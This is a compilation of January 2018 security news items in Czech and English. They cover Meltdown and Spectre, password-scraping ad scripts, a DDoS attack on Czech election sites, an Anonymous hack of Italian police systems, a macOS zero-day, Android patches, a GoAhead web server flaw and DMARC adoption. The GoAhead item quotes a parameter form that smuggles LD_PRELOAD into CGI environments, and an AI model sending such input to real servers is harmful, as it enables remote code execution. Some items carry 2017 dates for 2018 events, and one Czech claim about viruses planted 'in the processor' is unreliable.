První odhady byly příliš opatrné. Počítače kvůli chybě zpomalí až o polovinu

4.1.2018 Novinky/Bezpečnost Hardware
Nově objevená chyba v procesorech Intel bude mít daleko větší dopad na celkový výkon počítačů, než se původně předpokládalo. První testy naznačovaly, že rychlost procesorů poklesne v určitých početních úkonech až o 17 %. Nyní se však ukázalo, že v některých případech může být pokles výkonu až poloviční. Upozornil na to server ZDNet.
Nejrůznější testy procesorů od Intelu – a toho, jak se chovají před a po instalaci bezpečnostní aktualizace – doslova zaplavily internet. Prakticky všechny se shodují v tom, že úbytek výkonu není plošný, ale projevuje se jen při určitých pracích na počítačích.

Například při práci s videem a různými šifrovacími programy zaznamenal server Computerbase pokles výkonu pouze v řádu jednotek procent, což běžný uživatel nemá v praxi příliš šanci postřehnout.

Například při práci s databázemi však je již propad výrazně citelnější – zpravidla testy pojednávají o propadu okolo 20 %. Serveru Grsecurity však v některých testech vyšly propady výkonu pod operačním systémem Linux až o 51 %.

Sluší se připomenout, že chyba objevená v samotném jádře procesorů se týká prakticky všech desktopových platforem, tedy vedle zmiňovaného Linuxu také Windows a macOS.

AMD dává od kauzy ruce pryč
Zpráva serveru Grsecurity je zajímavá také tím, že podle ní se chyba týká i konkurenčních procesorů od AMD. A propady výkonu jsou po úpravách operačního systému stejně výrazné jako v případě Intelu.

Softwarový inženýr AMD Tom Lendecky však opakovaně prohlásil, že čipy tohoto podniku využívají zcela jinou architekturu než Intel, díky čemuž se jich aktuální problémy vůbec netýkají. Procesory totiž pracují jinak s pamětí a jádrem, a nemohou být tedy útočníky zneužity.

Lendecky však připustil, že AMD také vydalo nedávno bezpečnostní aktualizaci pro procesory. Ta se však k problémům Intelu nevztahuje.

Intel mlčí. Zatím
Na problém ve středu upozornil server The Register. V několika posledních generacích procesorů Intelu byla podle něj odhalena hardwarová chyba. Podobný bezpečnostní problém se vyskytl i u čipů platformy ARM, které využívá většina mobilních telefonů. 

Kvůli chybě mohou, zjednodušeně řečeno, počítačoví piráti propašovat virus přímo do procesoru, aniž by se před ním mohl uživatel jakkoli chránit. Intel zatím drží všechny informace k chybě pod přísným embargem, v opačném případě by jen napomohla ke zneužití kritické bezpečnostní chyby.


Neukládejte si důležitá hesla do prohlížeče. Nejsou tam v bezpečí!
4.1.2018 Živě.cz
Zabezpečení
Neukl%C3%A1dejte%20si%20d%C5%AFle%C5%BEit%C3%A1%20hesla%20do%20prohl%C3%AD%C5%BEe%C4%8De.%20Nejsou%20tam%20v%20bezpe%C4%8D%C3%AD!
Neukládejte si důležitá hesla do prohlížeče. Nejsou tam v bezpečí!Neukládejte si důležitá hesla do prohlížeče. Nejsou tam v bezpečí!
Většina webových prohlížečů obsahuje správu hesel, která ukládá vaše přihlašovací údaje. Výzkumníci z Princetonské univerzity však zjistili, že existují skripty, které dokážou uložené údaje z prohlížečů tajně extrahovat, upozornil The Verge.

Neukl%C3%A1dejte%20si%20d%C5%AFle%C5%BEit%C3%A1%20hesla%20do%20prohl%C3%AD%C5%BEe%C4%8De.%20Nejsou%20tam%20v%20bezpe%C4%8D%C3%AD!

Výzkumníci zkoumali dva existující rozšířené skripty AdThink a OnAudience, které se využívají k marketingovým účelům. Oba jsou navrženy tak, aby získaly identifikovatelné informace ze správců hesel. Pokud si uložíte přihlašovací údaje do prohlížeče, systém tato data použije při příští návštěvě. Skripty pracují na pozadí webové stránky a vkládají do ní neviditelné přihlašovací formuláře, které pak prohlížeč vyplní automaticky.

Neukl%C3%A1dejte%20si%20d%C5%AFle%C5%BEit%C3%A1%20hesla%20do%20prohl%C3%AD%C5%BEe%C4%8De.%20Nejsou%20tam%20v%20bezpe%C4%8D%C3%AD!

Systém tímto způsobem sbírá přihlašovací jména k webovým službám. Získané údaje slouží jako ID uživatele a sledují jaké stránky navštěvuje. Na základě těchto informací mohou firmy lépe cílit svou reklamu. Samotná technika sice není novinkou, ale doposud byla známá z oblasti spíše z oblasti spywaru. Poprvé tuto techniku ​​používají reklamní agentury.

Neukl%C3%A1dejte%20si%20d%C5%AFle%C5%BEit%C3%A1%20hesla%20do%20prohl%C3%AD%C5%BEe%C4%8De.%20Nejsou%20tam%20v%20bezpe%C4%8D%C3%AD!

Může sbírat i hesla
Pluginy se zaměřují na e-mailové adresy a přihlašování jména, avšak systém se dá nastavit i tak, aby sbíral i přihlašovací hesla. Ta jsou sice uložena v zašifrované podobě, ale při „předání“ hesla stránce do formulářového pole je pochopitelně dekódováno, aby mohlo dojít k přihlášení. Následně už dojde k jeho zašifrování na úrovni webu a posílá se k ověření na server. Ne každý prohlížeč má přitom dostatečně silnou kontrolu nad tím, jak je zacházeno s heslem v odhalené podobě.

Vydavatelé webových prohlížečů by měli změnit fungování správců hesel, řekl jeden z profesorů, který se projektu účastnil. Navrhl, že jedním z nejbezpečnějších řešení by bylo správce hesel v prohlížečích jednoduše zrušit.

Potěší alespoň to, že vědci nezjistili ani na jedné z 50 tisíc testovaných stránek, že by docházelo k získávání hesel. Nalezeno byly pouze skripty sbírající přihlašovací jména a e-mailové adresy.

Vyzkoušejte si to
Získávání údajů si můžete ověřit sami na stránce, kterou výzkumníci vytvořili. Stačí když zadáte vymyšlený e-mail, heslo a údaje uložíte do vašeho prohlížeče. Poté přejdete na další stránku a tam vám zobrazí údaje, které jste si pro tento web do prohlížeče uložili. Po této zkušenosti si zřejmě uděláte v prohlížeči čistku důležitých přihlašovacích údajů, což lze jenom doporučit.

V prohlížečích existuje správa hesel, kde můžete všechny uložené údaje zkontrolovat a případně promazat. V prohlížeči Chrome je trochu schovaná v nastavení, ale snadno se k ní dostanete přímo přes adresu: chrome://settings/passwords


Kdo napadl v říjnu volební weby? Policie stále pátrá

4.1.2018 Novinky/Bezpečnost Počítačový útok
Policie se stále zabývá hackerským útokem na volební weby Českého statistického úřadu (ČSÚ), který se uskutečnil loni v říjnu. Útok během volebního víkendu dočasně znepřístupnil informační stránky pro veřejnost, volební výsledky ale neovlivnil. Útočníka se však zatím ochráncům zákona dopadnout nepodařilo. Potvrdil to mluvčí Národní centrály proti organizovanému zločinu (NCOZ) Jaroslav Ibehej.

Kvůli hackerskému útoku byly volební weby volby.cz a volbyhned.cz nedostupné zhruba 2,5 hodiny. Šlo o tzv. DDoS útok (Distributed Denial of Service). Ten má vždy stejný scénář, stovky tisíc počítačů začnou přistupovat v jeden okamžik na konkrétní server. Ten zpravidla nezvládne tak vysoké množství požadavků zpracovat a spadne. Pro běžné uživatele se pak takto napadená webová stránka tváří jako nedostupná.

A přesně to bylo příčinou výpadku zmiňovaných volebních webů.

Výsledky voleb útok neovlivnil
„Národní centrála proti organizovanému zločinu, sekce kybernetické kriminality, se stále zabývá DDoS útokem na komunikační infrastrukturu externího dodavatele ČSÚ, v důsledku čehož byly zaznamenány výpadky na webech, které zveřejňovaly výsledky voleb do Poslanecké sněmovny Parlamentu České republiky," uvedl pro ČTK Ibehej.

Hackeři útočili přímo na síť operátora O2, proto byly weby volby.cz a volbyhned.cz nedostupné. „Je třeba zdůraznit, že DDoS útoky díky technickému řešení nijak neovlivnily sčítání hlasů ani systémy statistického úřadu,“ uvedla na dotaz Novinek mluvčí O2 Lucie Pecháčková.

Přiblížila, jak se útoky po uzavření volebních místností uskutečnily. „Poprvé se náznaky útoku objevily kolem 14. hodiny a v průběhu odpoledne několikrát vyřadily z provozu prezentační web volby.cz. Situaci jsme začali okamžitě řešit a v 16:30 se podařilo útoky definitivně odklonit,“ zdůraznila Pecháčková.

Kdy bude vyšetřování celého útoku uzavřeno, zatím není jasné. „O tom, jak dlouho bude trvat prověřování, zatím nebudeme spekulovat,“ uzavřel mluvčí NCOZ.

Případem se zabývá policie
ČSÚ zatím nechtěl útoky komentovat, protože je vyšetřuje policie a NÚKIB.

„Dle dostupných informací jde v případě tohoto DDoS útoku o víceméně dobře zvládnutý bezpečnostní incident. Výsledky voleb dle našeho názoru nemohl ovlivnit," podotkl ředitel bezpečnostní divize DCIT Karel Miko.

Podle technického ředitele antivirové firmy Eset Miroslava Dvořáka se dá podobným útokům čelit dostatečně robustní infrastrukturou v kombinaci s filtračními mechanismy. Lze to zajistit vlastními silami či využitím nabídek externích společností, tzv. scrubingových center. Vždy se zohledňuje nákladová efektivita takové ochrany.


Chyba v procesorech. Většina počítačů na světě se zpomalí

4.1.2018 Novinky/Bezpečnost Hardware
Prakticky celý svět žije v posledních týdnech kauzou týkající se úmyslného zpomalování chytrých telefonů iPhone od společnosti Apple. Jenže nový rok přinesl ještě daleko větší problém, který se dotkne drtivé většiny počítačů na světě – kvůli hardwarové chybě se zpomalí.

Že společnost Apple úmyslně zpomaluje iPhony, vyšlo najevo krátce před Vánocemi. Americký počítačový gigant od té doby tvrdí, že to „dělá v zájmu uživatelů“. Pokud je baterie příliš stará, snižuje se uměle výkon jablečných smartphonů, aby nedocházelo k neočekávaným chybám. 

A jak se nyní ukazuje, problémy se zpomalováním svých systémů bude řešit také společnost Intel – největší výrobce procesorů pro stolní počítače, notebooky a tablety na světě. Podle serveru The Register totiž byla v několika posledních generacích procesorů tohoto výrobce odhalena hardwarová chyba, která má dalekosáhlé následky.

Při pohledu na technickou stránku věci je chyba opravdu kritická. Kvůli bezpečnostní trhlině se může dostat škodlivý kód do adresního prostoru, který byl vyhrazen pouze pro jádro systému. Řeč je tedy o prostoru, ke kterému neměl uživatel jinak přístup.

Antiviry by nemusely pomoci
Zjednodušeně řečeno tak kvůli chybě mohou počítačoví piráti propašovat virus přímo do procesoru, aniž by se před ním mohl uživatel jakkoliv chránit. S adresním prostorem totiž nemohou pracovat například ani antivirové programy.

V současnosti jsou uživatelský prostor i ten pro jádro systému v procesoru mapovány společně, oprava chyby však vyžaduje jejich oddělení. A to je podle serveru The Register ten největší problém, protože po implementování záplaty dochází k citelnému zpomalení celého systému.

Vzhledem k tomu, že procesory společnosti Intel využívá více než 80 % počítačových systémů na světě, jde skutečně o problém obrovských rozměrů. Všem uživatelům – domácím i firemním – se kvůli tomu totiž sníží výkon jejich sestav.

Společnost Intel zatím drží všechny informace o chybě pod přísným embargem. Dokud nebudou záplaty nainstalované na všech počítačích, pomohlo by zveřejnění všech detailů hackerům v plánování útoků, aby mohli chybu skutečně zneužít v praxi.

Výkon nižší téměř o pětinu
Podle serveru The Register se nicméně problémy týkají procesorů Intel Core šesté, sedmé a osmé generace. Dále pak trhlina postihuje čipy Xeon v5, v6, Xeon-W a také procesory Pentium a Atom z nižších řad Apollo Lake.

Různé zahraniční servery, které se specializují na testování hardwaru, začaly okamžitě zkoušet výkon svých sestav před a po instalaci záplaty. A výsledky jsou alarmující. V některých případech totiž výkon poklesne klidně až o 17 %, tedy téměř o pětinu, což je již opravdu výrazná ztráta.

Postiženy všechny systémy
Pokles výkonu se týká především situací, kdy jsou procesory nasazeny ve firemním sektoru, například v serverech, na kterých běží nejrůznější databáze. Problém se přitom týká všech nejpoužívanějších operačních systémů, tedy Windows, macOS i linuxových distribucí, které jsou nasazovány v serverové sféře.

Velké podniky již kvůli tomu nahlásily odstávky svých systémů, aby mohly nainstalovat potřebné záplaty. Amazon své virtualizační služby vypne na několik hodin ještě tento týden, Microsoft má stejný proces údržby naplánovaný na příští středu.

Stejně tak budou postupně nuceni provést aktualizace i běžní uživatelé, neboť v opačném případě vystavují své systémy možnému riziku. Zda bude společnost Intel úbytek výkonu svým zákazníkům nějak kompenzovat, není v tuto chvíli jasné.

Týká se problém i dalších výrobců?
Jak upozornil server Grsecurity, bezpečnostní aktualizaci vydala pro své procesory také konkurenční společnost AMD. Ta však v oficiálním prohlášení tvrdí, že možnost zneužitelnosti objevené trhliny je prakticky nulová a že její procesory by neměly po instalaci trápit ztráty výkonu.

Vzhledem k tomu, že procesory AMD jsou nainstalovány jen na minoritní části počítačů, testy se soustředí především na čipy od konkurenčního Intelu. Na podrobnější výsledky si tak budeme muset ještě nějakou dobu počkat.

Podobná chyba nicméně byla objevena i u čipů platformy ARM, které využívá většina mobilních telefonů. Společnost ARM oznámila, že již poskytla nástroje k odstranění bezpečnostních nedostatků.


Anonymous Italia hacked speed camera database and took over the police systems in Correggio
4.1.2017 securityaffairs Hacking

Anonymous Italy hacked and deleted the entire speed camera database and took over the police email and database system in Correggio.
Last week, Anonymous hacked a Speed Camera Database in Italy, the hacktivists took control of a local police computer system in Correggio, Italy and erased the entire archive containing speed camera tickets. According to Gazzetta di Reggio, the hackers also released internal emails and documents.

Anonymous%20Italy%20speed%20camera%20database

The hackers provided screenshots of the attack to several Italian newspapers, it seems they have wiped an entire archive containing 40 gigabytes worth of infringement photographs.

Anonymous%20Italy%20speed%20camera%20database

The Anonymous hackers sent a message using the e-mail account of the Correggio municipal police.

“Ho Ho Ho, Merry Christmas,” read the message from Anonymous.

The message announced the hack of the Concilia database and of the system developed by the company Verbatel, it also included the links and passwords to download them.

The message includes screenshots of the hack, one of them show a Windows command line likely related to the hacked computer of the Correggio municipal police.

Two images show claims from two motorists complaining that they received tickets from Correggio speed cameras, even though they had never passed through the area.

Emails between police administrators and local politicians discussed how the speed camera profits were to be distributed.

One of the screenshots is related to an email sent by an employee at Correggio data center who explains that he has restored the Concilia DB using a backup dated Dec. 5 due to a serious problem.

The police are still investigating the case.


Meltdown and Spectre CPU Flaws Affect Intel, ARM, AMD Processors
4.1.2017 thehackernews
Vulnerebility

Unlike the initial reports suggested about Intel chips being vulnerable to some severe ‘memory leaking’ flaws, full technical details about the vulnerabilities have now been emerged, which revealed that almost every modern processor since 1995 is vulnerable to the issues.
Disclosed today by Google Project Zero, the vulnerabilities potentially impact all major CPUs, including those from AMD, ARM, and Intel—threatening almost all PCs, laptops, tablets, and smartphones, regardless of manufacturer or operating system.
These hardware vulnerabilities have been categorized into two attacks, named Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753 and CVE-2017-5715), which could allow attackers to steal sensitive data which is currently processed on the computer.
Both attacks take advantage of a feature in chips known as "speculative execution," a technique used by most modern CPUs to optimize performance.
"In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions," Project Zero says.
Therefore, it is possible for such speculative execution to have "side effects which are not restored when the CPU state is unwound and can lead to information disclosure," which can be accessed using side-channel attacks.
Meltdown Attack

 

Meltdown Attack papers  Spectre attack papers

The first issue, Meltdown (paper), allows attackers to read not only kernel memory but also the entire physical memory of the target machines, and therefore all secrets of other programs and the operating system.
“Meltdown is a related microarchitectural attack which exploits out-of-order execution in order to leak the target’s physical memory.”
Meltdown uses speculative execution to break the isolation between user applications and the operating system, allowing any application to access all system memory, including memory allocated for the kernel.
“Meltdown exploits a privilege escalation vulnerability specific to Intel processors, due to which speculatively executed instructions can bypass memory protection.”
Nearly all desktop, laptop, and cloud computers affected by Meltdown.
Spectre Attack

The second problem, Spectre (paper), is not easy to patch and will haunt people for quite some time since this issue requires changes to processor architecture in order to fully mitigate.
Spectre attack breaks the isolation between different applications, allowing the attacker-controlled program to trick error-free programs into leaking their secrets by forcing them into accessing arbitrary portions of its memory, which can then be read through a side channel.
Spectre attacks can be used to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.
“In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.” the paper explains.
“KAISER patch, which has been widely applied as a mitigation to the Meltdown attack, does not protect against Spectre.”
According to researchers, this vulnerability impacts almost every system, including desktops, laptops, cloud servers, as well as smartphones—powered by Intel, AMD, and ARM chips.
What You Should Do: Mitigations And Patches
Many vendors have security patches available for one or both of these attacks.
Windows — Microsoft has issued an out-of-band patch update for Windows 10, while other versions of Windows will be patched on the traditional Patch Tuesday on January 9, 2018
MacOS — Apple had already fixed most of these security holes in macOS High Sierra 10.13.2 last month, but MacOS 10.13.3 will enhance or complete these mitigations.
Linux — Linux kernel developers have also released patches by implementing kernel page-table isolation (KPTI) to move the kernel into an entirely separate address space.
Android — Google has released security patches for Pixel/Nexus users as part of the Android January security patch update. Other users have to wait for their device manufacturers to release a compatible security update.
Mitigations for Chrome Users
Since this exploit can be executed through the website, Chrome users can turn on Site Isolation feature on their devices to mitigate these flaws.
Here's how to turn Site Isolation on Windows, Mac, Linux, Chrome OS or Android:
Copy chrome://flags/#enable-site-per-process and paste it into the URL field at the top of your Chrome web browser, and then hit the Enter key.
Look for Strict Site Isolation, then click the box labeled Enable.
Once done, hit Relaunch Now to relaunch your Chrome browser.
There is no single fix for both the attacks since each requires protection independently.


Huge Flaws Affect Nearly Every Modern Device; Patch Could Hit CPU Performance
4.1.2017 thehackernews
Vulnerebility


UPDATE: Researchers have finally disclosed complete technical details of two kernel side-channel attacks, Meltdown and Spectre—which affect not only Intel but also systems and devices running AMD, ARM processors—allowing attackers to steal sensitive data from the system memory.
____________
The first week of the new year has not yet been completed, and very soon a massive vulnerability is going to hit hundreds of millions of Windows, Linux, and Mac users worldwide.
According to a blog post published yesterday, the core team of Linux kernel development has prepared a critical kernel update without releasing much information about the vulnerability.
Multiple researchers on Twitter confirmed that Intel processors (x86-64) have a severe hardware-level issue that could allow attackers to access protected kernel memory, which primarily includes information like passwords, login keys, and files cached from disk.
The security patch implements kernel page-table isolation (KPTI) to move the kernel into an entirely separate address space and keeps it protected and inaccessible from running programs and userspace, which requires an update at the operating system level.
"The purpose of the series is conceptually simple: to prevent a variety of attacks by unmapping as much of the Linux kernel from the process page table while the process is running in user space, greatly hindering attempts to identify kernel virtual address ranges from unprivileged userspace code," writes Python Sweetness.
It is noteworthy that installing the update will hit your system speed negatively and could bring down CPUs performance by 5 percent to 30 percent, "depending on the task and processor model."
"With the page table splitting patches merged, it becomes necessary for the kernel to flush these caches every time the kernel begins executing, and every time user code resumes executing."
Much details of the flaw have been kept under wraps for now, but considering its secrecy, some researchers have also speculated that a Javascript program running in a web browser can recover sensitive kernel-protected data.
AMD processors are not affected by the vulnerability due to security protections that the company has in place, said Tom Lendacky, a member of the Linux OS group at AMD.
"AMD processors are not subject to the types of attacks that the kernel page table isolation feature protects against," the company said.
"The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault."
The Linux patch that is being released for ALL x86 processors also includes AMD processors, which has also been considered insecure by the Linux mainline kernel, but AMD recommends specifically not to enable the patch for Linux.
Microsoft is likely to fix the issue for its Windows operating system in an upcoming Patch Tuesday, and Apple is also likely working on a patch to address the vulnerability.


Intel, AMD Chip Vulnerabilities Put Billions of Devices at Risk
4.1.2018 securityweek
Attack
Details of "Meltdown" and "Spectre" Attacks Against Intel and AMD Chips Disclosed

Researchers have disclosed technical details of two new attack methods that exploit critical flaws in CPUs from Intel, AMD and other vendors. They claim billions of devices are vulnerable, allowing malicious actors to gain access to passwords and other sensitive data without leaving a trace.

There have been reports in the past few days about a critical flaw in Intel CPUs that allows an attacker to gain access to kernel space memory. It turns out that there are actually two different attacks and researchers say one of them impacts AMD and ARM processors as well.

AMD representatives have claimed that their products are not vulnerable, which has contributed to the company’s stock going up 7 percent. Intel released a statement saying that the vulnerabilities are not unique to its products after its shares lost 4 percent in value.

Meltdown and Spectre

The side-channel attacks, dubbed Meltdown and Spectre by researchers, allow malicious applications installed on a device to access data as it’s being processed. This can include passwords stored in a password manager or web browser, photos, documents, emails, and data from instant messaging apps.

Attacks can be launched not only against PCs, but also mobile devices and cloud servers. While there is no evidence of exploitation in the wild, researchers pointed out that the attacks don’t leave any traces in traditional log files and they are unlikely to be detected by security products – although security products may detect the malware that launches Meltdown and Spectre.

Meltdown was discovered independently by Jann Horn of Google Project Zero, researchers from Cyberus Technology, and a team from the Graz University of Technology in Austria. Spectre was found independently by Horn, and a group of experts from various universities and companies. Technical papers and proof-of-concept (PoC) code have been published for each of the attack methods, and Intel, Microsoft, ARM and Google Project Zero are expected to publish their own advisories.

Memory isolation mechanisms found in modern computer systems should normally prevent applications from reading or writing to kernel memory or accessing the memory of other programs. However, the Meltdown and Spectre attacks bypass these protections.Meltdown

Meltdown, named so because it “melts” security boundaries normally enforced by hardware, can be leveraged to read arbitrary kernel memory locations. A malicious unprivileged app can use it to read memory associated with other programs and even virtual machines in cloud environments. The vulnerability behind Meltdown is tracked as CVE-2017-5754.

Researchers say it’s unclear if Meltdown affects ARM and AMD processors, but it has been confirmed to impact nearly every Intel processor made since 1995, specifically CPUs that implement a system known as out-of-order execution.

Spectre, on the other hand, has been confirmed to affect not just Intel, but also AMD and ARM processors. However, AMD claims there is a “near zero risk” to its processors due to their architecture.

Desktops, laptops, smartphones and cloud servers are impacted, but the vulnerability is more difficult to exploit compared to Meltdown.

The attack has been named Spectre because its root cause is speculative execution and it will “haunt us for quite some time” due to the fact that it’s not easy to fix. The CVE identifiers CVE-2017-5753 and CVE-2017-5715 have been assigned to Spectre.Spectre

Spectre breaks isolation between different applications and it allows an attacker to trick programs that follow best practices to leak secrets stored in their memory.

“Meltdown breaks the mechanism that keeps applications from accessing arbitrary system memory. Consequently, applications can access system memory,” researchers explained. “Spectre tricks other applications into accessing arbitrary locations in their memory. Both attacks use side channels to obtain the information from the accessed memory location.”

Mitigations

Meltdown attacks can be prevented using kernel page table isolation (KPTI), a hardening technique designed to improve security by isolating the kernel space from user space memory. It’s based on the KAISER system developed last year by a team of researchers at Graz University.

KPTI has already been implemented in the Linux kernel and Microsoft has been working on a similar system for Windows. Apple is also said to be working on patches for macOS.

Cloud providers that use Intel CPUs and Xen paravirtualization are impacted. Amazon Web Services (AWS) and Microsoft Azure have been working on patches and they have informed customers that cloud instances will need to be rebooted in the upcoming days to apply security patches.

Google has addressed the vulnerabilities in its Cloud products and services. The company pointed out that while attacks are not easy to launch against Android devices, the latest Android security updates do provide additional protection.

Spectre attacks are more difficult to block. However, researchers say it’s possible to prevent specific known exploits using software patches.

Intel addresses concerns of performance penalties introduced by mitigations

Since KPTI has already been implemented in the Linux kernel before the disclosure – this actually led to experts figuring out that there was a serious vulnerability in Intel CPUs – several tests have been conducted to determine the impact of the mitigation on performance.

The researchers who developed the KAISER method reported a negative impact of only 0.28 percent on performance, but tests conducted now showed that performance penalties can reach as much as 30 percent, depending on what types of operations are being conducted.

Michael Schwartz, one of the researchers involved in the discovery of the Meltdown and Spectre vulnerabilities, has confirmed for SecurityWeek that there definitely can be a significant performance penalty for certain types of workloads.

“We ran some benchmarks on our initial KAISER implementation which showed only small performance impacts on modern CPUs. However, we guess that the performance penalties reported by other people (something between 5% - 30%) are realistic on older CPUs and unusual workload (e.g., many syscalls),” Schwartz said.

Intel has reassured customers that any performance impacts are workload-dependent and they should not be significant for the average user. Furthermore, the chip maker says performance impact will be mitigated over time.


Apple Working on Patch for New Year's Eve macOS Flaw
4.1.2018 securityweek Apple
Apple is aware of the macOS vulnerability disclosed by a researcher on New Year’s Eve and the company plans on patching it later this month.

A security expert who uses the online moniker Siguza has made public the details and proof-of-concept (PoC) code for a local privilege escalation vulnerability affecting all versions of the macOS operating system.

The flaw, which the researcher described as a “zero day,” allows a malicious application installed on the targeted system to execute arbitrary code and obtain root privileges.

Apple is working on patching the vulnerability and has shared some mitigation advice until the fix becomes available.

“Apple is committed to the security of our customers’ devices and data, and we plan to patch this issue in a software update later this month,” Apple said in a statement emailed to SecurityWeek. “Since exploiting the vulnerability requires a malicious app to be loaded on your Mac, we recommend downloading software only from trusted sources such as the Mac App Store.”

The flaw affects IOHIDFamily, a kernel extension designed for human interface devices (e.g. touchscreens and buttons). Siguza discovered that some security bugs in this component introduce a kernel read/write vulnerability, which he has dubbed IOHIDeous.

The exploit created by the hacker also disables the System Integrity Protection (SIP) and Apple Mobile File Integrity (AMFI) security features.

The PoC exploit is not stealthy as it needs to force a logout of the legitimate user. However, the researcher said an attacker could design an exploit that is triggered when the targeted device is manually rebooted or shut down.

Some of the PoC code made available by Siguza only works on macOS High Sierra 10.13.1 and earlier, but the researcher believes it can be adapted for version 10.13.2 as well.

The vulnerability has been around since at least 2002, but it could actually be much older.

Siguza says he is not concerned that malicious actors will abuse his PoC exploit as the vulnerability is not remotely exploitable. The hacker claims he would have privately disclosed the flaw to Apple had it been remotely exploitable or if the tech giant’s bug bounty program covered macOS.


Google Patches Multiple Critical, High Risk Vulnerabilities in Android
4.1.2018 securityweek Android
Google patched several Critical and High severity vulnerabilities as part of its Android Security Bulletin for January 2018.

A total of 38 security flaws were resolved in the popular mobile OS this month, 20 as part of the 2018-01-01 security patch level and 18 in the 2018-01-05 security patch level. Five of the bugs were rated Critical and 33 were rated High risk.

Four of the vulnerabilities addressed with the 2018-01-01 security patch level were rated Critical, all of them remote code execution bugs. The remaining 16 issues resolved in this patch level were High risk elevation of privilege and denial of service vulnerabilities.

An elevation of privilege bug that Google patched in Android runtime could be exploited remotely to bypass user interaction requirements in order to gain access to additional permissions.

The most severe of the 15 vulnerabilities resolved in Media framework could allow an attacker using a specially crafted malicious file to execute arbitrary code within the context of a privileged process. These include 3 Critical remote code execution bugs, 4 High severity elevation of privilege issues, and 8 High risk denial of service flaws.

One other Critical remote code execution bug was patched in System, along with two High severity elevation of privilege flaws and one High risk denial of service vulnerability.

Only one of the flaws fixed with the 2018-01-05 security patch level was a Critical vulnerability. Along with 6 High severity flaws, it was affecting Qualcomm closed-source components.

The patch level also resolved a High risk denial of service issue in HTC components and High risk elevation of privilege bugs in LG components, Media framework, MediaTek components, and NVIDIA components (one in each).

The security patch level addressed three High severity elevation of privilege and one information disclosure bug in Kernel components, along with two High risk elevation of privilege vulnerabilities in Qualcomm components.

Google also resolved 46 vulnerabilities in Google devices as part of the Pixel / Nexus Security Bulletin—January 2018. Most of the flaws were rated Moderate severity, exception making issues addressed in Media framework (some were rated Low risk and others were rated High severity on older Android versions).

Impacted components included Framework (1 vulnerability), Media framework (16 vulnerabilities), System (1 flaw), Broadcom components (1 issue), HTC components (1 flaw), Kernel components (7 bugs), MediaTek components (1 issue), and Qualcomm components (18 vulnerabilities).

In addition to patching security flaws, the security bulletin also addressed functionality issues on Pixel devices. The update adjusted the handling of key upgrades in keystore and improved stability and performance after installing an OTA.

On Google devices, all of these issues are fixed as part of the security patch levels of 2018-01-05 or later.


Devices Running GoAhead Web Server Prone to Remote Attacks
4.1.2018 securityweek
Attack
A vulnerability affecting all versions of the GoAhead web server prior to version 3.6.5 can be exploited to achieve remote code execution (RCE) on Internet of Things (IoT) devices.

GoAhead is a small web server employed by numerous companies, including IBM, HP, Oracle, Boeing, D-link, and Motorola, is “deployed in hundreds of millions of devices and is ideal for the smallest of embedded devices,” according to EmbedThis, its developer.

The web server is currently present on over 700,000 Internet-connected devices out there, a Shodan search has revealed.

However, not all of these devices are impacted by said remote code execution vulnerability. Tracked as CVE-2017-17562, the vulnerability is triggered only in special conditions and affects only devices with servers running *nix that also have CGI support enabled with dynamically linked executables (CGI scripts).

Discovered by Elttam security researchers, the flaw is the “result of initializing the environment of forked CGI scripts using untrusted HTTP request parameters.” If the aforementioned conditions are met, the behavior can be abused for remote code execution when combined with the glibc dynamic linker, using special variables such as LD_PRELOAD.

The security researchers discovered that the issue affects all versions of the GoAhead source since at least 2.5.0, with the optional CGI support enabled.

The bug resides in the cgiHandler function, “which starts by allocating an array of pointers for the envp argument of the new process, followed by initializing it with the key-value pairs taken from HTTP request parameters. Finally, the launchCgi function is called which forks and execve’s the CGI script,” Elttam explains.

While REMOTE_HOST and HTTP_AUTHORIZATION are filtered, the remaining parameters are considered trusted and are passed along unfiltered. Thus, an attacker can control arbitrary environment variables used in a new CGI process.

To resolve the issue, EmbedThis introduced a skip for special parameter names and a prefix of all other parameters with a static string. This patch should resolve the issue even when parameters of the form a=b%00LD_PRELOAD%3D are used, Elttam says.

The issue, the researchers say, could exist in other services as well, not only in GoAhead web servers compiled with CGI support enabled.

“Although the CGI handling code remained relatively stable in all versions of the web server (which made it the ideal target), there has been a significant amount of code churn over the years in other modules. It’s possible there are other interesting vulnerabilities [in the web server],” Elttam concludes.


DMARC Implemented on Half of U.S. Government Domains
4.1.2018 securityweek Safety
Government agencies in the United States have made progress in the implementation of the DMARC standard in response to a Department of Homeland Security (DHS) directive, but the first deadline is less than two weeks away.

The Binding Operational Directive (BOD) 18-01 issued by the DHS in mid-October instructs all federal agencies to start using web and email security technologies such as HTTPS, STARTTLS and DMARC.

DMARC (Domain-based Message Authentication, Reporting and Conformance) is an email authentication, policy, and reporting protocol designed to detect and prevent email spoofing. Organizations can set the DMARC policy to “none” in order to only monitor unauthenticated emails, “quarantine” to send them to the spam or junk folder, or “reject” to completely block their delivery.

The DHS has ordered government agencies to implement DMARC with at least a “none” policy by January 15. Organizations will then need to set their DMARC policy to “reject” within one year.

A few days after the DHS made the announcement, security firm Agari checked over 1,000 domains owned by federal agencies and found that only 18% had implemented DMARC. By mid-November it increased to 34% and in December it reached 47%.

However, only 16% of them had deployed “quarantine” or “reject” policies by December, an increase of two percentage points compared to the previous month.

DMARC%20adoption%20in%20US%20government

More than 20 agencies have fully implemented DMARC, including the Federal Communications Commission (FCC), the Federal Trade Commission (FTC), the Senate, the Postal Service, the Department of Health and Human Services (HHS), and Department of Veterans Affairs.

The HHS has deployed DMARC across more than 100 of its domains, including ones used by Healthcare.gov, the National Institutes of Health (NIH), and the Centers for Disease Control and Prevention (CDC).

Agari said the overall email attack rate for government customers that had implemented DMARC dropped to less than one percent.

“Deploying a DMARC policy where p=none is simple, but it is only the first step,” Agari said in a report published on Tuesday. “To fully protect against phishing threats against both the federal government and the public at large (and maintain strong email governance), federal agencies must ultimately move to Quarantine and Reject policies.”


LockPoS Adopts New Injection Technique
4.1.2018 securityweek
Virus
The LockPoS Point-of-Sale (PoS) malware has been leveraging a new code injection technique to compromise systems, Cyberbit researchers say.

